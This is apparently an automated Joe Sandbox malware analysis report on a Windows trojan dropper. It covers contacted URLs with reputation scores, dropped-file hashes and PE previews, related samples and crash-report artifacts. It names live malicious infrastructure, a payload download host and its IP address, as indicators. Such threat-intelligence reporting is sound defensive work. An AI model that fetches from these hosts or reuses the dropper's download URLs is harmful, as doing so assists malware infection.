    https://login.live.coQmD.exe, 00000002.00000003.1638844737.0000000000698000.00000004.00000020.00020000.00000000.sdmp, oQmD.exe, 00000002.00000002.1843788615.0000000000695000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://ddos.dnsnb8.net:799/cj//k2.rarf=QoQmD.exe, 00000002.00000002.1843788615.0000000000695000.00000004.00000020.00020000.00000000.sdmptrue
    • Avira URL Cloud: phishing
    unknown
    http://upx.sf.netAmcache.hve.2.drfalse
    • URL Reputation: safe
    unknown
    http://www.rftp.comSciTE.exe.2.drfalse
    • URL Reputation: safe
    unknown
    http://ddos.dnsnb8.net:799/cj//k2.raroQmD.exe, 00000002.00000002.1843788615.0000000000695000.00000004.00000020.00020000.00000000.sdmp, oQmD.exe, 00000002.00000002.1843788615.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, oQmD.exe, 00000002.00000002.1844225317.00000000023FA000.00000004.00000010.00020000.00000000.sdmptrue
    • URL Reputation: malware
    unknown
    http://ddos.dnsnb8.net:799/cj//k2.rarooQmD.exe, 00000002.00000002.1843788615.00000000006DB000.00000004.00000020.00020000.00000000.sdmptrue
    • 16%, Virustotal, Browse
    • Avira URL Cloud: phishing
    unknown
    http://www.baanboard.comBrendonSciTE.exe.2.drfalse
    • URL Reputation: safe
    unknown
    https://www.smartsharesystems.com/SciTE.exe.2.drfalse
    • URL Reputation: safe
    unknown
    http://www.scintilla.orgSciTE.exe.2.drfalse
    • URL Reputation: safe
    unknown
    http://www.spaceblue.comMathiasSciTE.exe.2.drfalse
    • URL Reputation: safe
    unknown
    https://www.smartsharesystems.com/MortenSciTE.exe.2.drfalse
    • URL Reputation: safe
    unknown
    http://ddos.dnsnb8.net:799/cj//k2.rartoQmD.exe, 00000002.00000002.1843788615.0000000000695000.00000004.00000020.00020000.00000000.sdmptrue
    • 11%, Virustotal, Browse
    • Avira URL Cloud: phishing
    unknown
    http://www.develop.comSciTE.exe.2.drfalse
    • URL Reputation: safe
    unknown
    http://www.lua.orgSciTE.exe.2.drfalse
    • URL Reputation: safe
    unknown
    http://ddos.dnsnb8.net/oQmD.exe, 00000002.00000002.1843788615.0000000000695000.00000004.00000020.00020000.00000000.sdmp, oQmD.exe, 00000002.00000002.1843788615.000000000063E000.00000004.00000020.00020000.00000000.sdmptrue
    • URL Reputation: malware
    unknown
    http://www.spaceblue.comSciTE.exe.2.drfalse
    • URL Reputation: safe
    unknown
    http://ddos.dnsnb8.net:799/cj//k2.rarIoQmD.exe, 00000002.00000002.1844225317.00000000023FA000.00000004.00000010.00020000.00000000.sdmptrue
    • 10%, Virustotal, Browse
    • Avira URL Cloud: phishing
    unknown
    http://www.baanboard.comSciTE.exe.2.drfalse
    • URL Reputation: safe
    unknown
    http://ddos.dnsnb8.net/-window-ext-l1-1-0.dlloQmD.exe, 00000002.00000002.1843788615.0000000000695000.00000004.00000020.00020000.00000000.sdmptrue
    • 14%, Virustotal, Browse
    • Avira URL Cloud: malware
    unknown
    http://ddos.dnsnb8.net:799/cj//k1.rarioQmD.exe, 00000002.00000002.1843788615.000000000063E000.00000004.00000020.00020000.00000000.sdmptrue
    • 12%, Virustotal, Browse
    • Avira URL Cloud: phishing
    unknown
    http://www.develop.comDeepakSciTE.exe.2.drfalse
    • URL Reputation: safe
    unknown
    http://ddos.dnsnb8.net/amDataoQmD.exe, 00000002.00000002.1843788615.0000000000695000.00000004.00000020.00020000.00000000.sdmptrue
    • 9%, Virustotal, Browse
    • Avira URL Cloud: malware
    unknown
    http://ddos.dnsnb8.net:799/cj//k2.rarAppDataoQmD.exe, 00000002.00000002.1843788615.0000000000695000.00000004.00000020.00020000.00000000.sdmptrue
    • Avira URL Cloud: phishing
    unknown
    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs
    IPDomainCountryFlagASNASN NameMalicious
    44.221.84.105
    ddos.dnsnb8.netUnited States
    14618AMAZON-AESUSfalse
    Joe Sandbox version:40.0.0 Tourmaline
    Analysis ID:1488690
    Start date and time:2024-08-06 12:33:05 +02:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 4m 58s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of analysed new started processes analysed:12
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:1hdqYXYJkr.exe
    renamed because original name is a hash value
    Original Sample Name:08d1bb65d58c5974d0192a4d843499305f6aecc7bc671349fc52abf931116be5.exe
    Detection:MAL
    Classification:mal100.spre.troj.evad.winEXE@7/15@1/1
    EGA Information:
    • Successful, ratio: 100%
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 15
    • Number of non-executed functions: 58
    Cookbook Comments:
    • Found application associated with file extension: .exe
    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
    • Excluded IPs from analysis (whitelisted): 20.42.73.29, 52.182.143.212
    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
    • Not all processes where analyzed, report is missing behavior information
    • Report size getting too big, too many NtOpenFile calls found.
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.
    TimeTypeDescription
    06:34:11API Interceptor2x Sleep call for process: WerFault.exe modified
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    44.221.84.105Bank Form.scr.exeGet hashmaliciousDarkTortilla, FormBookBrowse
    • npukfztj.biz/rxgykrbfdsub
    O1hktZEwpg.exeGet hashmaliciousAZORult, Quasar, RamnitBrowse
    • 0x21.in/_az/
    7Y18r(193).exeGet hashmaliciousBdaejec, StealcBrowse
    • ddos.dnsnb8.net:799/cj//k1.rar
    BUG32.exeGet hashmaliciousBdaejecBrowse
    • ddos.dnsnb8.net:799/cj//k1.rar
    7Y18r(216).exe.dllGet hashmaliciousBdaejec, SalityBrowse
    • ddos.dnsnb8.net:799/cj//k1.rar
    A9095F44928219267930271D2AD000C7B2F7F2616DB4AD186E5D3AA283D14764.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
    • ddos.dnsnb8.net:799/cj//k1.rar
    BUG32.exeGet hashmaliciousBdaejecBrowse
    • ddos.dnsnb8.net:799/cj//k2.rar
    builder_Release.exeGet hashmaliciousBdaejecBrowse
    • ddos.dnsnb8.net:799/cj//k1.rar
    BOTBINARY.EXE.exeGet hashmaliciousBdaejecBrowse
    • ddos.dnsnb8.net:799/cj//k4.rar
    BkPack.exeGet hashmaliciousBdaejecBrowse
    • ddos.dnsnb8.net:799/cj//k3.rar
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    ddos.dnsnb8.net7Y18r(193).exeGet hashmaliciousBdaejec, StealcBrowse
    • 44.221.84.105
    BUG32.exeGet hashmaliciousBdaejecBrowse
    • 44.221.84.105
    7Y18r(212).exeGet hashmaliciousBdaejecBrowse
    • 44.221.84.105
    7Y18r(216).exe.dllGet hashmaliciousBdaejec, SalityBrowse
    • 44.221.84.105
    A9095F44928219267930271D2AD000C7B2F7F2616DB4AD186E5D3AA283D14764.exeGet hashmaliciousBabuk, Bdaejec, DjvuBrowse
    • 44.221.84.105
    BUG32.exeGet hashmaliciousBdaejecBrowse
    • 44.221.84.105
    builder_Release.exeGet hashmaliciousBdaejecBrowse
    • 44.221.84.105
    A9BCD8D127BE95C64EDAE5CDD2379494A37D458FD9D5881D74F8D5487A805E6C.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
    • 44.221.84.105
    BOTBINARY.EXE.exeGet hashmaliciousBdaejecBrowse
    • 44.221.84.105
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    AMAZON-AESUSi2RndFIwSG.lnkGet hashmaliciousPureLog StealerBrowse
    • 52.22.41.97
    https://www.intimissimi.com/uk/Get hashmaliciousUnknownBrowse
    • 34.197.96.27
    154.216.17.9-skid.x86_64-2024-08-04T06_23_14.elfGet hashmaliciousMirai, MoobotBrowse
    • 54.139.242.143
    45.66.231.148-mips-2024-07-31T23_07_02.elfGet hashmaliciousUnknownBrowse
    • 44.223.193.61
    45.66.231.148-mipsel-2024-07-30T12_25_27.elfGet hashmaliciousUnknownBrowse
    • 54.145.127.6
    Bank Form.scr.exeGet hashmaliciousDarkTortilla, FormBookBrowse
    • 44.221.84.105
    77.90.35.9-skid.mpsl-2024-07-30T06_23_54.elfGet hashmaliciousMirai, MoobotBrowse
    • 107.23.89.32
    77.90.35.9-skid.sh4-2024-07-30T07_10_53.elfGet hashmaliciousMirai, MoobotBrowse
    • 44.207.141.82
    ORDER883274777724884pdf.vbsGet hashmaliciousAveMaria, PrivateLoaderBrowse
    • 3.5.25.225
    (No subject) (48).emlGet hashmaliciousUnknownBrowse
    • 44.205.122.114
    No context
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    C:\Users\user\AppData\Local\Temp\oQmD.exe7Y18r(193).exeGet hashmaliciousBdaejec, StealcBrowse
      7Y18r(212).exeGet hashmaliciousBdaejecBrowse
        7Y18r(216).exe.dllGet hashmaliciousBdaejec, SalityBrowse
          7Y18r(223).exeGet hashmaliciousBdaejecBrowse
            builder_Release.exeGet hashmaliciousBdaejecBrowse
              A9BCD8D127BE95C64EDAE5CDD2379494A37D458FD9D5881D74F8D5487A805E6C.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
                BOTBINARY.EXE.exeGet hashmaliciousBdaejecBrowse
                  BkPack.exeGet hashmaliciousBdaejecBrowse
                    bss.exeGet hashmaliciousBdaejecBrowse
                      C0ED98D08381257B540A04C0868ECD6A628649AA70FEBCBE03778BAE532FB5BE.exeGet hashmaliciousBdaejec, BitCoin Miner, XmrigBrowse
                        Process:C:\Users\user\AppData\Local\Temp\oQmD.exe
                        File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):19456
                        Entropy (8bit):6.590864781050491
                        Encrypted:false
                        SSDEEP:384:1FBSjXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:0dQGPL4vzZq2o9W7GsxBbPr
                        MD5:3DDB52AB7F3E3B75FFEE7FA7BA0FA92B
                        SHA1:BD525BA27163B1E417B458CEE575B75B7CA38339
                        SHA-256:08660C312C5B94E8E7CF9FC7E7598298C970697F94B4EF1BBF67E0290940D473
                        SHA-512:95EE1277F25E828B94BB581126E898BD0EB860504E6D6223774480BB686700F53CCB668A7570F9835AB69DA8C3F1D55FE5F601C6EFDAF9773D6EB17D08D3ADD9
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        Reputation:low
                        Preview:MZ..........................................................@...PE..L....................................0............................................................................................... ..l...........................................................................................................PELIB...............................`....rsrc........ ......................@..@..Y|.uR..P...0...B.................. ...................................................................................j.h"...h....j...(....Hello World!.MyProg........................................................................................................................................................................................................................(...........0...(.......................;.......User32.dll...MessageBoxA................................................................................................dummy.exe.....................TestExport.CallPlz................
                        Process:C:\Users\user\AppData\Local\Temp\oQmD.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Category:modified
                        Size (bytes):2389504
                        Entropy (8bit):6.73134352412953
                        Encrypted:false
                        SSDEEP:49152:BGSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL:V4OEtwiICvYMpf
                        MD5:8F7FF28DE0C7DE762C0FEE4D761D325E
                        SHA1:D562A865FDF740AC1C9DAE4C374F40640FEBAC92
                        SHA-256:2D9794B1DCF7E9AA26DD26EEF99BD0BFD5602165FAB86C6FEE0D3A498282F4D9
                        SHA-512:1D62427867F0B0971032FEEB938DF3F133EA11828E5A5FBBC81587E8A13E3AB23A7AC558CC552168F2C331C9E02746DC7541812374780F4D62E85E977F4E3892
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        Reputation:low
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................
                        Process:C:\Users\user\AppData\Local\Temp\oQmD.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):31744
                        Entropy (8bit):6.3659167052102585
                        Encrypted:false
                        SSDEEP:768:uWQ3655Kv1X/qY1MSdn6QGPL4vzZq2o9W7GsxBbPr:uHqaNrFdn5GCq2iW7z
                        MD5:ED83F296076DC089180D82A4997748D4
                        SHA1:DCF12C203640D10766220A0399E74C64C3241C24
                        SHA-256:054FF234650F96F2B243CD1A3F6992418A4B1ADF83AF6F422C6DF763C96D5BA5
                        SHA-512:08988B47BC4D3A664C7BE1C88AB223E2E09781FAEF882506E080929514BB3463E7C0C5B88A5A9BD93DE092BC8F10F634225567354DAB00A22008E9F4C6EFAF2A
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        Reputation:low
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.7083428006526343
                        Encrypted:false
                        SSDEEP:192:VtBcQITJYh0BU/5j+ju1zuiFCZ24IO8okW:m/TyiBU/AjczuiFCY4IO8S
                        MD5:3CA5A73D589F1C4AA12E878F03F58E02
                        SHA1:2AE496E30DA7A33BAC6D2E2BF9A033FA590BBE99
                        SHA-256:D943813F03034CB06024A0731AAACACA8821942708B35BECA91DE7381AC68413
                        SHA-512:434B398BC6654173D0DB83C016B455714170A44B998E75B2709B51D8F757FE61F840520E05381EE398581564C14F611252E3486CADD6004705E1F895EDC41DD7
                        Malicious:true
                        Reputation:low
                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.7.4.1.4.0.3.2.2.8.6.7.1.5.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.7.4.1.4.0.3.3.5.6.7.9.6.0.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.b.3.0.2.2.a.d.-.b.3.1.7.-.4.e.1.c.-.8.e.2.9.-.a.b.1.5.4.2.d.0.d.e.b.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.7.9.2.5.3.6.4.-.6.8.2.7.-.4.2.8.7.-.b.a.e.b.-.e.3.5.4.d.1.2.e.c.3.c.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.1.h.d.q.Y.X.Y.J.k.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.8.4.-.0.0.0.1.-.0.0.1.4.-.e.2.9.4.-.0.4.2.1.e.c.e.7.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.7.e.b.7.5.c.a.4.5.0.3.8.3.e.a.e.1.7.6.8.f.d.e.f.0.b.a.4.3.d.2.0.0.0.0.f.f.f.f.!.0.0.0.0.1.a.1.3.f.3.f.b.4.b.8.c.1.9.4.7.8.2.0.4.e.1.9.1.2.6.d.b.d.8.d.2.f.8.1.c.f.d.b.e.!.1.h.d.q.Y.X.Y.J.k.r...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.9702724759302217
                        Encrypted:false
                        SSDEEP:192:XPZbKOTi01UXeFQj0/ljzuiFCZ24IO89v:dbTp1meFQjazuiFCY4IO89
                        MD5:BAFA9B53BB4F8B0E2C1CC16D6970F5C6
                        SHA1:D4607369C9551F3D4B84CB83035AB9FE7D21F8DA
                        SHA-256:E12FE8F3461996EB2AFB27D4748BFEAFD317AB47C50A083CBDC1DA47A3B3E06F
                        SHA-512:E9CF5E44192033DB2EB1B154EC3F75E54F347D1AF6FEC065F398152D240B51820E07C0E5619864468865627BD435A093C554C6A12654F7452F2B76E64659C65A
                        Malicious:false
                        Reputation:low
                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.7.4.1.4.0.3.6.7.5.1.4.3.1.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.7.4.1.4.0.3.7.2.2.0.1.7.9.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.a.e.e.8.d.1.4.-.b.1.2.e.-.4.a.7.4.-.8.9.d.c.-.f.6.5.5.8.b.f.0.0.7.4.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.f.6.c.0.2.3.1.-.5.a.e.0.-.4.8.a.b.-.9.3.8.e.-.5.a.5.3.8.1.2.a.2.d.5.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.o.Q.m.D...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.a.c.-.0.0.0.1.-.0.0.1.4.-.b.c.7.5.-.1.c.2.1.e.c.e.7.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.a.5.5.0.b.5.d.1.6.c.c.7.6.6.3.2.1.d.4.5.3.0.0.6.4.c.7.5.a.5.9.0.0.0.0.f.f.f.f.!.0.0.0.0.d.4.e.9.e.f.1.0.d.7.6.8.5.d.4.9.1.5.8.3.c.6.f.a.9.3.a.e.5.d.9.1.0.5.d.8.1.5.b.d.!.o.Q.m.D...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.3././.1.1.
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Mini DuMP crash report, 15 streams, Tue Aug 6 10:33:56 2024, 0x1205a4 type
                        Category:dropped
                        Size (bytes):163544
                        Entropy (8bit):1.7934771350840615
                        Encrypted:false
                        SSDEEP:768:pJ6QBtpkGp2Jgdjo8z8mwlcqxSKqxhYXm6lO6:vlkid98mwl1xSKqxhYXm6lf
                        MD5:EFFF2B7D98CDCB11866C53746F3184C0
                        SHA1:5F16ED9745D0E027F35E26BC0704B15B698B7B80
                        SHA-256:296A1EC0D858FBF6773009836DCA1BE0DCC5FAD8D608812C24D28C855B3A2C1C
                        SHA-512:0CD9B1975B337E3894A5023C8B7640FD7C299357C41E537E9E32D14DC91340791ADDD3CD15ADE4E777830B98CABCDCDB0C1ADAD1925B61BE1BEE5388A97B7E1F
                        Malicious:false
                        Reputation:low
                        Preview:MDMP..a..... ..........f............t.......................<...T ...........P..........`.......8...........T............=..8A........... ..........|"..............................................................................eJ.......#......GenuineIntel............T..............f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):8246
                        Entropy (8bit):3.693904366662552
                        Encrypted:false
                        SSDEEP:192:R6l7wVeJkg67F6YbVv6NXgmfG+X/VpDT89b7ssfTpm:R6lXJD6Z6YB61gmfGQM7/fw
                        MD5:A1079314EDA0E8D796F30D13D0853652
                        SHA1:E2919D7C3A6DC8FC40C6683DEFEF68E120ED6FF1
                        SHA-256:074C767974F4E7EE9A89C0508C37BF769EEDB97EBE6B1D2C03A61AFC0A527122
                        SHA-512:9E604EE4E0FA66E3563BE2423BDD83CE237B4248F11663702454D517DB0EB34792E349E383C5D71A12EE42684E7BDFF09AAD88335FB62089907F11A350A78210
                        Malicious:false
                        Reputation:low
                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.3.1.6.<./.P.i.
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):4537
                        Entropy (8bit):4.430514907655063
                        Encrypted:false
                        SSDEEP:48:cvIwWl8zsgJg77aI9zUf7WpW8VYyYm8M4JQCF9qR+q8umklgSydd:uIjfmI7CC7V6J+6klgSydd
                        MD5:9AB75A15AA7E79248AC70D34FEF181D8
                        SHA1:1CA8571BBDCDAD595C6EF8D4D9B8B44243056D43
                        SHA-256:ED1E96AEB83534631952E32F5AC372DFB76D1041E83B29C7AC6F000A01A19DF7
                        SHA-512:9C1A040E80BF11101D74785F3EDE52601FA4526540D0775CDFEECD355690358D59169C62FF3DE00F66B5561A7AC57D5CF349F466745683AB1017116654A930FE
                        Malicious:false
                        Reputation:low
                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="443616" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:Mini DuMP crash report, 14 streams, Tue Aug 6 10:33:52 2024, 0x1205a4 type
                        Category:dropped
                        Size (bytes):35276
                        Entropy (8bit):1.7186184267694466
                        Encrypted:false
                        SSDEEP:192:F8i1cISmSO0s8kXtYb7nhlhWif8ZYWooU:GiN0srXtYb7nhlLf+YW
                        MD5:7B8D092FF3112FEDCC4682B7A89A9749
                        SHA1:607DD61B7492276D7898EBC045741061A501AD3A
                        SHA-256:37F68B834AED8DA6F6390F117F0C3910AE7BEA5DF91E204EB269FCA89B897EAB
                        SHA-512:BA3CA845E5EC8C670A191DBFAC8989BEA691B785455717E4FED63CB8D61E51530FAB2DBB0D3B81A25246F92BAA15A021BA84665664F49F4A8B5A081139CCA54E
                        Malicious:false
                        Reputation:low
                        Preview:MDMP..a..... ..........f........................X...............Z...........T.......8...........T...............<}......................................................................................................eJ......x.......GenuineIntel............T..............f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):8402
                        Entropy (8bit):3.7001988324726924
                        Encrypted:false
                        SSDEEP:192:R6l7wVeJLVPb6VX6Y9FSU9Jc4kGgmfK7/prQ89bWrsfbym:R6lXJt6N6YPSU9JcCgmfcfWwfv
                        MD5:80990C44243963DBF53CFF3D9D1B579B
                        SHA1:BB05C4E2719923E24E24EF7CB893DC04CB66A747
                        SHA-256:59B06CD3D405B713EB201D8D4F7E8BAE8D7D9DE14DC815A6CB51AE155F9C1E36
                        SHA-512:FCED77BCECB1C0B51EF36DB180C9AE75DE6ABEDFC2B48C4DF043E7A5CA1859E5FD85FE794BDD59C11125F9B04C62DB1ADEA76F86D1951CA997F80C32240994E1
                        Malicious:false
                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.4.4.<./.P.i.
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
